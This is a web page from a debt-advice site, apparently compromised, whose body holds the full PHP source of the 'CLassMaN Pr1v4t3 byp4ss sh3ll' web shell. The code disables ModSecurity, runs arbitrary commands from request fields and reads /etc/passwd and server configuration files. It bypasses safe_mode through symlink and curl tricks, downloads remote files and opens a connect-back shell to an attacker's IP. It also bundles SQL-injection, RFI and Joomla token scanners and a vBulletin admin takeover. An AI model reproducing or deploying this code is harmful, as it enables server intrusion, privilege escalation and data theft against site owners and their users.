Citi Driver’s Edge Platinum Select Card

/*======================================================================*\
|| #################################################################### ||
|| # PR1V4T3 CLassSpy Bypass Sh3LL # ||
|| # ---------------------------------------------------------------- # ||
|| # All Rights Reserved by CLassMaN & The-Sabotage.Org # ||
|| # Copyright 2006 - 2009 # ||
|| # ---------------------Coded by CLassMaN-------------------------- # ||
|| # http://www.classtasarim.net | http://www.The-Sabotage.Org # ||
|| #################################################################### ||
\*======================================================================*/
?>

———————————————————————————————————————————————————————————-

Sunucu Özelliklerini Kapat

Safe Mod On / Off | Sunucuyu Kapat | Cgi Telnet Perl İzin Ver

// Sunucu Özellikleri Kapama

$mod=$_REQUEST["mod"];
//########################################## Mod Security Oluştur.#####################################//////////
if($mod=="mod")
{
if(file_exists(".htaccess"))
{ unlink(".htaccess."); }

$xha = fopen(".htaccess","w+");
fwrite($xha,"\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\n“);
fclose($xha);
echo “Mod Security Kapatıldı…”;
echo ““;
}

//########################################## Sunucuyu Kapat.#####################################//////////
if($mod==”sunucu”)
{
if(file_exists(“.htaccess”))
{ unlink(“.htaccess.”); }

$xha = fopen(“.htaccess”,”w+”);
fwrite($xha,”AddType application/x-httpd-php4 .php”);
fclose($xha);
echo “Sunucu Kapatıldı…shelle Geri Dön”;
echo ““;

}

//########################################## Cgi Telnet Çalıştır.#####################################//////////
if($mod==”cgi”)
{
if(file_exists(“.htaccess”))
{ unlink(“.htaccess.”); }

$xha = fopen(“.htaccess”,”w+”);
fwrite($xha,”Options ExecCGI\r\nAddType application/x-httpd-cgi .class\r\nAddHandler cgi-script .class”);
fclose($xha);
echo “Cgi Telnet perl uzantıları Açıldı..”;
echo ““;

}
?>

———————————————————————————————————————————————————————————-

echo "

by CLassMaN Pr1v4t3 byp4ss sh3ll

“;
$class = @php_uname();
$class2 = system(uptime);
$class3 = system(id);
$class4 = @getcwd();
$class5 = getenv(“SERVER_SOFTWARE”);
$class6 = phpversion();
$class7 = $_SERVER['SERVER_NAME'];
$class8 = gethostbyname($SERVER_ADDR);
$class11 = gethostbyname($SERVER_ADDR);
$class9 = get_current_user();
$os = @PHP_OS;
$class10=@ini_get(‘disable_functions’);

echo “os: $os
“;
echo “uname -a: $class
“;
echo “uptime: $class2
“;
echo “id: $class3
“;
echo “pwd: $class4
“;
echo “user: $class9
“;
echo “phpv: $class6
“;
echo “SoftWare: $class5
“;
echo “ServerName: $class7
“;
echo “Server ip: $class11
“;
echo “ServerAddr: $class8
“;
print “\n”.’Disable_functions: ‘.((($df=@ini_get(‘disable_functions’))==”)?’NONE‘:’‘.str_replace(array(‘,’,';’), ‘, ‘, $df).’‘);

$cmd=shell_exec($_GET['class']); echo”

$cmd

“;
?>

error_reporting (0);
set_time_limit (0);
if (empty ($_GET ['dir'])){
$dir = getcwd ();
}
else {
$dir = $_GET ['dir'];
}
chdir ($dir);
$current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);

echo "

“;
echo “
“;
echo “

\n”;
echo “

Shell Command

Upload file

Port Scan

“;

$mode = $_GET ['mode'];
switch ($mode){
case ‘edit’:
$dosya = $_GET ['dosya'];
$new = $_POST ['new'];
if (empty ($new)){
$fp = fopen ($dosya, “r”);
$dosya_cont = fread ($fp, filesize ($dosya));
$dosya_cont = str_replace (““, “<textarea>“, $dosya_cont); echo “ <form action = '".$current."&mode=edit&dosya=".$dosya."' method = 'POST'>\n”; echo “File: “. $dosya . “ \n”; echo “<textarea name = 'new' rows = '10' cols = '50'>“.$dosya_cont.”<textarea> \n”; echo “ <input type = 'submit' value = 'Save !!!'></form> \n”; } else { $fp = fopen ($dosya, “w”); if (fwrite ($fp, $new)){ echo $dosya . ” Saved !!!. “; } else { echo “Unable to edit ” . $dosya . “. “; } } fclose ($fp); break; case ‘delete’: $dosya = $_GET ['dosya']; if (unlink ($dosya)){ echo $dosya . ” deleted successfully. “; } else { echo “Unable to delete ” . $dosya . “. “; } break; case ‘copy’: $src = $_GET ['src']; $dst = $_POST ['dst']; if (empty ($dst)){ echo “ <form action = '".$current . "&mode=copy&src=" . $src . "' method = 'POST'>\n”; echo “Destination: <input name = 'dst'>\n”; echo “ <input type = 'submit' value = 'Copy'></form> \n”; } else { if (copy ($src, $dst)){ echo “File copied successfully. \n”; } else { echo “Unable to copy ” . $src . “. \n”; } } break; case ‘move’: $src = $_GET ['src']; $dst = $_POST ['dst']; if (empty ($dst)){ echo “ <form action = '".$current . "&mode=move&src=" . $src . "' method = 'POST'>\n”; echo “Destination: <input name = 'dst'>\n”; echo “ <input type = 'submit' value = 'Move'></form> \n”; } else { if (rename ($src, $dst)){ echo “File moved successfully. \n”; } else { echo “Unable to move ” . $src . “. \n”; } } break; case ‘rename’: $old = $_GET ['old']; $new = $_POST ['new']; if (empty ($new)){ echo “ <form action = '".$current . "&mode=rename&old=" . $old . "' method = 'POST'>\n”; echo “New name: <input name = 'new'>\n”; echo “ <input type = 'submit' value = 'Rename'></form> \n”; } else { if (rename ($old, $new)){ echo “File/Directory renamed successfully. \n”; } else { echo “Unable to rename ” . $old . “. \n”; } } break; case ‘rmdir’: $rm = $_GET ['rm']; if (rmdir ($rm)){ echo “Directory removed successfully. \n”; } else { echo “Unable to remove ” . $rm . “. \n”; } break; case ‘system’: $cmd = $_POST ['cmd']; if (empty ($cmd)){ echo “ <form action = '".$current . "&mode=system' method = 'POST'>\n”; echo “Shell Command: <input name = 'cmd'>\n”; echo “ <input type = 'submit' value = 'Run'></form> \n”; } else { system (ccmd); } break; case ‘create’: $new = $_POST ['new']; if (empty ($new)){ echo “ <form action = '".$current . "&mode=create' method = 'POST'>\n”; echo “ <tr> <td>New file: <input name = 'new'></td> \n”; echo “ <td> <input type = 'submit' value = 'Create'></td> </tr> </form> \n “; } else { if ($fp = fopen ($new, “w”)){ echo “File created successfully. \n”; } else { echo “Unable to create “.$dosya.” \n”; } fclose ($fp); } break; case ‘upload’: $temp = $_FILES['upload_dosya']['tmp_name']; $dosya = basename($_FILES['upload_dosya']['name']); if (empty ($dosya)){ echo “ <form action = '".$current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n”; echo “Local file: <input type = 'dosya' name = 'upload_dosya'>\n”; echo “ <input type = 'submit' value = 'Upload'>\n”; echo “</form> \n <pre>\n\n</pre> “; } else { if(move_uploaded_file($temp,$dosya)){ echo “File uploaded successfully. \n”; unlink ($temp); } else { echo “Unable to upload ” . $dosya . “. \n”; } } break; case ‘port_scan’: $port_range = $_POST ['port_range']; if (empty ($port_range)){ echo “ <table> <form action = '".$current. "&mode=port_scan' method = 'POST'>“; echo “ <tr> <td> <input type = 'text' name = 'port_range'></td> <td>“; echo “Enter port range where you want to do port scan (ex.: 0:65535)</td> </tr> “; echo “ <tr> <td> <input type = 'submit' value = 'Port Scan'></td> </tr> </form> </table> “; } else { $range = explode (“:”, $port_range); if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){ echo “Bad parameters. “; } else { $host = ‘localhost’; $from = $range [0]; $to = $range [1]; echo “Open ports: “; while ($from <= $to){ $var = 0; $fp = fsockopen ($host, $from) or $var = 1; if ($var == 0){ echo $from . " “; } $from++; fclose ($fp); } } } break; } clearstatcache (); echo “ <pre>\n\n</pre> “; echo “ <table width = 100%>\n”; $files = scandir ($dir); foreach ($files as $dosya){ if (is_file ($dosya)){ $size = round (filesize ($dosya) / 1024, 2); echo “ <tr> <td>“.$dosya.”</td> “; echo “ <td>“.$size.” KB</td> “; echo “ <td><a href = ".$current . "&mode=edit&dosya=".$dosya.">Edit</a></td> \n”; echo “ <td><a href = ".$current . "&mode=delete&dosya=".$dosya.">Delete</a></td> \n”; echo “ <td><a href = ".$current . "&mode=copy&src=".$dosya.">Copy</a></td> \n”; echo “ <td><a href = ".$current . "&mode=move&src=".$dosya.">Move</a></td> \n”; echo “ <td><a href = ".$current . "&mode=rename&old=".$dosya.">Remame</a></td> </tr> \n”; } else { $items = scandir ($dosya); $items_num = count ($items) – 2; echo “ <tr> <td>“.$dosya.”</td> “; echo “ <td>“.$items_num.” Items</td> “; echo “ <td><a href = ".$current . "/" . $dosya.">Change directory</a></td> \n”; echo “ <td><a href = ".$current . "&mode=rmdir&rm=".$dosya.">Remove directory</a></td> \n”; echo “ <td><a href = ".$current . "&mode=rename&old=".$dosya.">Rename directory</a></td> </tr> \n”; } } echo “</table> \n”; ?> </td> </tr> </table> <table class="safemod" width="900" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"> <table class="safemod" width="900" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="30" align="center" valign="top" class="style2"> </td> </tr> <tr> <td height="211" align="center" valign="top"> Command & Speed Menu <form method="post"> <input type="text" size="40" value="<? if($_POST['classbabaa'] != "") { echo $_POST ['classbabaa']; } else echo $dirrrrrrrr;?>” name=”classbabaa” /> <input type="submit" value="Run !" /> <? $classbaba=$_POST['classbabaa']; if($_POST['classbabaa']) { ini_restore("safe_mode"); ini_restore("open_basedir"); $safemodgec = shell_exec($classbaba); } ?> <select name="switch"> <option selected="selected" value="file">View file</option> <option value="dir">View dir</option> </select> <input type="text" size="50" name="string" /> <input type="submit" value="Run !" /> <?php $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { $stream = imap_open($string, "", ""); if ($stream == FALSE) die("Can't open imap stream"); $str = imap_body($stream, 1); if (!empty($str)) echo " <pre>“.$str.”</pre> "; imap_close($stream); } elseif ($string && $switch == "dir") { $stream = imap_open("/etc/passwd", "", ""); if ($stream == FALSE) die("Can't open imap stream"); $string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), "*"); echo " <pre>"; for ($i = 0; $i < count($dir_list); $i++) echo "$dir_list[$i]\n"; echo "</pre> "; imap_close($stream); } ?> <select size="1" name="noldu"> <option value="cat /etc/passwd">/etc/passwd</option> <option value="netstat -an | grep -i listen">netstat -an</option> <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option> <option value="cat /etc/syslog.conf">/etc/syslog.conf</option> <option value="cat /etc/hosts">/etc/hosts</option> <option value="cat /etc/named.conf">/etc/named.conf</option> <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option> <option value="ls -lia /etc/vdomainaliases">/etc/vdomainaliases</option> </select> <input type="text" size="40" name="command" /> <input type="submit" name="sub" value="Run !" /> <input type="radio" name="method" value="1" /> shell_exec(); <input type="radio" name="method" value="2" /> system(); <input type="radio" name="method" value="3" /> passthru(); <input type="radio" name="method" value="4" /> automatic(); <center> <textarea name="textarea" cols="100" rows="6"><?php if (isset($_GET['safemodedir'])) { $meth=$_POST['method']; $com=$_POST['command']; if (isset($meth)) { if ($meth=="1") { echo shell_exec($com); } elseif($meth=="2") { echo system($com); } elseif ($meth=="3") { passthru($com); } elseif ($meth=="4") { if (function_exists(shell_exec)) { echo shell_exec($com); } elseif (function_exists(system)) { echo system($com); } elseif (function_exists(passthru)) { echo passthru($com); } else { echo "[-]Error"; } } } } ?> <? ini_restore("safe_mode"); ini_restore("open_basedir"); $noldu=shell_exec($_POST[mal]); $haha=shell_exec($_POST[noldu]); echo $noldu; echo $haha; echo $safemodgec; ?>

Php 5.2.9 Safe_Mode & Open_basedir ByPass
if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];

echo '

AME"]).$_SERVER["PHP_SELF"].'" method="post">

';

$level=0;

if(!file_exists("file:"))
mkdir("file:");
chdir("file:");
$level++;

$hardstyle = explode("/", $file);

for($a=0;$a if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$level++;
}
}

while($level--) chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);

echo ''; if(FALSE==curl_exec($ch)) die('uzgunum... Dosya '.htmlspecialchars($file).' permissions izinlerinden Dolayi Gecis Yok.'); echo ' ';

curl_close($ch);

?>

Error Log bypass
if($fileup == ""){
ECHO " reade for up ";
}else{
$path= exec("pwd");
$path .= "/$fileup_name";
$CopyFile = copy($fileup,"$path");
if($CopyFile){
echo " up ok ";
}else{
echo " no up ";
}
}
if(empty($_POST['m'])){
} else {
$m=$_POST['m'];
echo system($m);
}
if(empty($_POST['cmd'])){
} else {
$h= $_POST['cmd'];
print include($h) ;
}
?>

Sh3LL Uzaktan Url Upload

echo'

';
$calistir=$_POST['calistir'];
$secim=$_POST['secim'];
$url=$_POST['url'];
$isim=$_POST['isim'];
if($calistir && $secim && $url){

if($secim=="wget"){
$calistir("wget ".$url);
}elseif($secim=="lynx"){
$calistir("lynx -source ".$url." > ".$isim);
}elseif($secim=="fetch"){
$calistir("fetch -o ".$isim." -p ".$url);
}elseif($secim=="get"){
$calistir("get ".$url." > ".$isim);
}elseif($secim=="curl"){
$calistir("curl ".$url." -o ".$isim);
}

}
?>

print ('

Hazır Komut Satırı

');

ini_restore("safe_mode");
ini_restore("open_basedir");

switch ($zt) {
case ($zt==1): $nescafe=shell_exec($_POST['cmd']); $classbaba=shell_exec($_POST['classman']);echo "$classbaba $nescafe";Break;

case ($zt==2): $nescafe=passthru($_POST['cmd']); $classbaba=passthru($_POST['classman']);echo "$classbaba";Break;

case ($zt==3): $nescafe=popen($_POST['cmd']); $classbaba=popen($_POST['classman']);echo "$classbaba";Break;

case ($zt==4): $nescafe=eval($_POST['cmd']); $classbaba=eval($_POST['classman']);echo "$classbaba";Break;

case ($zt==5): $nescafe=exec($_POST['cmd']); $classbaba=exec($_POST['classman']);echo "$classbaba";Break;

case ($zt==6): $nescafe=system($_POST['cmd']); $classbaba=system($_POST['classman']);echo "$classbaba
";Break;

Default:logout();Break;
}
echo "

";
$mip=$_POST['mip'];
$bport=$_POST['bport'];
if ($mip <> "")
{
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Hata: bağlantı Kurulamadı";
}
else {
fputs ($fp ,"\n

whoami
root
\n\n");
while(!feof($fp)){
fputs ($fp);
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,"--> ".$message."\n");
}
fclose ($fp);
}
}
?>

Pr1v4t3 Hack T00ls

Google Searcher - SQL Injection Scanner - RFI Scanner - Server Listeleyici - Joomla Token Search - Hex Converter - MD5 Olustur
//########################################## Google Search.#####################################//////////
$class=$_GET['class'];

if($class=="google"){
echo'
Aranacak kelimeyi yaziniz default listeleme sayisi 10

';
$kelime=$_POST['kelime'];
$sayi=$_POST['sayi'];
if($kelime && $sayi){
$ch=curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
curl_setopt($ch,CURLOPT_URL,"http://www.google.com.tr/search?num=".$sayi."&hl=tr&lr=&as_qdr=all&q=".$kelime."&sa=N");
curl_setopt($ch,CURLOPT_REFFERER,"http://www.google.com");
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4");
curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__).'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, dirname(__FILE__).'/cookie.txt');
$al=curl_exec ($ch);
curl_close($ch);
preg_match_all("#

foreach($ver[1] as $listele){
ob_flush();
flush();
usleep(500000);
echo $listele.'
';
}
}
}
//########################################## Sql Scanner.#####################################//////////
if($class=="sql"){
echo'
Sql injection taranacak sitelerin listesini yaziniz.
örnek: site.com/class.php?id=35

 

';
$liste=htmlspecialchars($_POST['liste']);
if($liste){
$satirlar=explode("\n",$liste);
foreach($satirlar as $s){
$tmz=trim($s);
$son=$tmz.""."1'a";
ob_flush();
flush();
usleep(500000);
$ch=curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
curl_setopt($ch,CURLOPT_URL,$son);
$al=curl_exec($ch);
curl_close($ch);
if(eregi("Unclosed",$al)){
echo ''.$son.' -----> MSSQL Injection
';
}
elseif(eregi("SQL syntax",$al)){
echo ''.$son.' -----> MySQL Injection
';
}
elseif(eregi("MySQL",$al)){
echo ''.$son.' -----> MySQL Injection
';
}
elseif(eregi("Syntax error",$al)){
echo ''.$son.' -----> ACCESS Injection
';
}
elseif(eregi("Access",$al)){
echo ''.$son.' -----> ACCESS Injection
';
}
elseif(eregi("JET Database",$al)){
echo ''.$son.' -----> JETDB Injection
';
}else{
echo $son.' -----> yok
';
}
}
}}
//########################################## Rfi Scanner.#####################################//////////

if($class=="rfi"){
echo'
RFI taranacak sitelerin listesini yaziniz.

örnek: site.com/class.php?include=

 

';
$liste=htmlspecialchars($_POST['liste']);
$shell=htmlspecialchars($_POST['shell']);
if($liste && $shell){
$satirlar=explode("\n",$liste);
foreach($satirlar as $s){
$tmz=trim($s);
$rfi=$tmz."".$shell;
ob_flush();
flush();
usleep(500000);
$ch=curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
curl_setopt($ch,CURLOPT_URL,$rfi);
$al=curl_exec($ch);
curl_close($ch);
if(eregi("safe",$al)){
echo $tmz.' -----> eXploit
';
}else{echo $tmz.' -----> RFI yok.
';}
}
}
}
//########################################## Server Listeleme.#####################################//////////
if($class=="server"){
echo'
Domain adini veya ip adresini yazin

';
function cek($aq){
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,"http://www.find-ip-address.org/reverse_lookup/");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"s=".$aq);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
$al=curl_exec($ch);
curl_close($ch);
return $al;
}
$site=$_POST['site'];
if($site){
$kaynak=cek($site);
preg_match_all('#(.*?)#si',$kaynak,$ver);
foreach($ver[2] as $goster){
ob_flush();
flush();
usleep(500000);
echo $goster.'
';
}
}
}
//########################################## Joomla Token Scanner.#####################################//////////
if($class=="token"){
echo'
Joomla kurulu sitelerin listesini yaziniz

 

';
$liste=htmlspecialchars($_POST['liste']);
if($liste){
$satirlar=explode("\n",$liste);
foreach($satirlar as $s){
ob_flush();
flush();
usleep(500000);
$cikti=trim($s);
$ekle="/index.php?option=com_user&view=reset&layout=confirm";
$class=$cikti."".$ekle;
$ch=curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
curl_setopt($ch,CURLOPT_URL,$class);
$al=curl_exec($ch);
curl_close($ch);
if(eregi('token',$al)){
echo ''.$cikti.' ------> eXploit...
';
}else{
echo $cikti.' ------> yok
';
}}
}}
//########################################## Hex Oluştur.#####################################//////////
if($class=="hex"){
echo'Sql injection için

';
$str=htmlspecialchars($_POST['str']);
if($str){
echo '0x'.bin2hex($str);
}}
//########################################## Md5 Oluştur.#####################################//////////

if($class=="md5"){
echo'Md6 sifreleme

';
$md5=htmlspecialchars($_POST['md5']);
if($md5){
echo md5($md5);
}}
//###################################### Scanner ların Kod Bitişi.#####################################//////////
?>

Vbulletin Admin Olma

//########################################## Vbulletin Admin Olma.#####################################//////////
if(empty($_POST['send2'])){
echo "

";
}else{
$config1 = $_POST['config1'];
include("$config1");
$userid1 = $_POST['userid1'];
$adminid1 = $_POST['adminid1'];
//****************************************************
$refix = $config['Database']['tableprefix'];
$administrator = $refix."administrator";
$user = $refix."user";
$usergroup = $refix."usergroup";
//****************************************************
@mysql_connect($config['MasterServer']['servername'],$config['MasterServer']['username'],$config['MasterServer']['password']) or die(print "

CLassMaN Baba Config Yolunu Yanlış Yazdın Galiba

");
@mysql_select_db($config['Database']['dbname']) or die(mysql_error());

//--------------------------------------------------------------------------------------
$ssw221= mysql_query("SELECT * FROM $user where userid=$adminid1");
while($res221= mysql_fetch_array($ssw221)){
$z223= $res221['usergroupid'];
}

//****************************************************
//
//****************************************************
$ssw= mysql_query("SELECT * FROM $administrator where userid= $adminid1");
while($res= mysql_fetch_array($ssw)){
$x= $res['adminpermissions'];
}
$k12=@mysql_query("INSERT INTO $administrator(userid,adminpermissions) VALUES (".$userid1.",".$x."); ") or die(mysql_error());
$k1=mysql_query("UPDATE $user SET usergroupid = $z223 WHERE userid = $userid1") or die(mysql_error());

//****************************************************
if($k1 and $k12){
echo "

CLassMaN Baba Yine Admin Oldun =)

";
}else{
echo "

Başarısız

";
}
}
//########################################## Kod Bitişi.#####################################//////////
?>

5.2.5 / 5.2.6 PHP ver -

Symlink Safe Mode Bypass Vulnerability

Read File: " size="59" />
Server User :
Site User Us:

<?php if ($_GET['alias'] ) system('ls -al /etc/valiases'); if ($_GET['classman'] ) for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "\n"; } } echo "";

$k = $_GET['c'];
$flib = "classbaba.txt";

if ($k == "") {
die;
}else{
@unlink($flib);
$sym = $k;
$link = getcwd() . "/" . $flib;
@symlink($sym, $link);
if ($k{0} == "/") {
echo "";
}else{
echo "

";<br />
echo readlink($flib) . "\n";<br />
echo "Filesize: " . linkinfo($flib) . "B\n\n";<br />
$ddir = getcwd();<br />
$file2 = str_replace($DOCUMENT_ROOT,'' , $ddir);<br />
$file2 = "http://" . $SERVER_NAME . $filee . $flib;<br />
$result = file_get_contents($file2); echo $result;<br />
}<br />
}<br />
echo "<br />
<h1>By CLassMaN Pr1v4t3 byp4ss sh3ll</h1>
<p>";<br />
?></p>
<tr>
<td colspan="2" align="left">
<tr>
<td colspan="2" align="left">
<p>              </textarea>
               </td>
</tr>
</table>
</table>
<p></p>
</table>
<p>
</body><br />
</html></p>

				
			</div>
		</div>
				</div>

	<div id="sidebar" role="complementary">
		


<ul>
						<li>
				<form role="search" method="get" id="searchform" action="http://www.debtcs.com/" >
	<div><label class="screen-reader-text" for="s">Search for:</label>
	<input type="text" value="" name="s" id="s" />
	<input type="submit" id="searchsubmit" value="Search" />
	</div>
	</form>			</li>

			<!-- Author information is disabled per default. Uncomment and fill in your details if you want to use it.
			<li><h2>Author</h2>
			<p>A little something about you, the author. Nothing lengthy, just an overview.</p>
			</li>
			-->

					</ul>



                  <table id="menu" cellpadding="0" cellspacing="0">
<tbody><tr>
  <td class="header">Browse</td>
</tr>
<tr>
 <td align="left" valign="top">
  <ul>
  <li><a href="/">Home</a></li>

  <li><a href="/articles/faqs.html">FAQs</a></li>
  <li><a href="/articles/">Articles</a></li>
  <li><a href="/resources/">Resources</a></li>
  <li><a href="/article-storehouse/">Article Storehouse</a>
  </li></ul>

 </td>
</tr>
</tbody></table>

<table id="menu" cellpadding="0" cellspacing="0">
<tbody><tr>
  <td class="header">Popular Articles</td>
</tr>
<tr>
 <td align="left" valign="top">
  <ul>
  <li><a href="/debt-consolidation.html">Debt Consolidation</a></li>

  <li><a href="/debt-settlement.html">Debt Settlement</a></li>
  <li><a href="/articles/bankruptcy.html">Bankruptcy</a></li>
  <li><a href="/articles/studentloan.html">Student loans</a></li>
  <li><a href="/articles/credit-counseling.html">Credit counseling</a></li>
  <li><a href="/articles/debt-management.html">Debt management</a></li>
  <li><a href="/articles/debt-consolidation-tips">Debt Consolidation Tips</a></li>

  <li><a href="/articles/credit-score.html">Credit score</a></li>
  <li><a href="/debt-consolidation-loans.html">Debt consolidation Loan</a></li>
  <li><a href="/articles/management-plan.html">Debt Management Plan</a></li>
  <li><a href="/articles/creditcarddebt.html">Credit Card Debt</a></li>
  <li><a href="/articles/bad-credit-remortgage.html">Bad Credit Remortgage</a></li>
  <li><a href="/what-constitutes-credit-card-debt-collectors-harassment.html">Debt Collection</a></li>
  <li><a href="/articles/news.html">News</a></li>
  </ul>
 </td>
</tr>
</tbody></table>


	
				


			
					</ul>
	</div>



<hr />
<div id="footer" role="contentinfo">
<!-- If you'd like to support WordPress, having the "powered by" link somewhere on your blog is the best way; it's our only promotion or advertising. -->
	<p>
              <a href="/contact-us">Contact Us</a> |
              <a href="/sitemap.html">Sitemap</a> 

		
	</p>
</div>
</div>

<!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/kubrick/ -->

		
</body>
</html>